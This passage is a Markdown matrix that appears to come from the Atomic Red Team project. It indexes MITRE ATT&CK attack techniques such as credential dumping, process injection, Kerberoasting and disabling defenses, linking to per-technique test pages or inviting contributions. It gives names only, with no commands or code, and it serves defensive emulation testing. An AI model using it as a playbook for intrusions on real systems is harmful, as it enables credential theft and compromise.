| | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Software Deployment Tools](../../T1072/T1072.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
| | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery](../../T1518/T1518.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Steal Application Access Token](../../T1528/T1528.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Time Discovery](../../T1124/T1124.md) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Time Providers](../../T1547.003/T1547.003.md) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Indirect Command Execution](../../T1202/T1202.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | | | | | |
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | | |
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Process Injection](../../T1055/T1055.md) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forced Authentication](../../T1187/T1187.md) | | | | | | |
| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
| | | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
| | | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Rogue Domain Controller](../../T1207/T1207.md) | [Kubernetes List Secrets](../../T1552.007/T1552.007.md) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
| | | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
